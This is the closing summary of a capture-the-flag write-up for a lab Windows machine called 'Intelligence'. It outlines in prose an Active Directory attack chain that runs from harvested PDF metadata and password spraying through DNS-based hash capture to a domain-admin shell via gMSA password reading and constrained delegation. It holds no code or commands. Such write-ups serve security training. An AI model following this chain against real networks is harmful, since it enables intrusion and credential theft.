So that was “Intelligence” for you. It is a Windows machine that showcases a number of common attacks in an Active Directory environment. We retrieved internal PDF documents stored on the web server (by brute-forcing a common naming scheme) and inspected their contents and metadata, which revealed a default password and a list of potential AD users. Password spraying then led to the discovery of a valid user account, granting us an initial foothold on the system. After that, a scheduled PowerShell script that sends authenticated requests to web servers based on their hostname was discovered. By adding a custom DNS record, we were able to force a request that could be intercepted to capture the hash of a second user, which was easily crackable. This user was allowed to read the password of a group managed service account, which in turn has constrained delegation access to the domain controller, resulting in a shell with administrative privileges. On that note, I will take your leave and will meet you in the next one. Till then, “Happy hacking”.
